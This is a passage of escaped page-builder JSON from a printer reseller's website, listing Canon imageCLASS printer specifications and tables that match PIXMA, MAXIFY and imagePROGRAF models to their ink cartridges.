capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n<td>Maintenance Cartridge MC-20<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Blue)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td>\\n<td>CL-98 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-88 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL 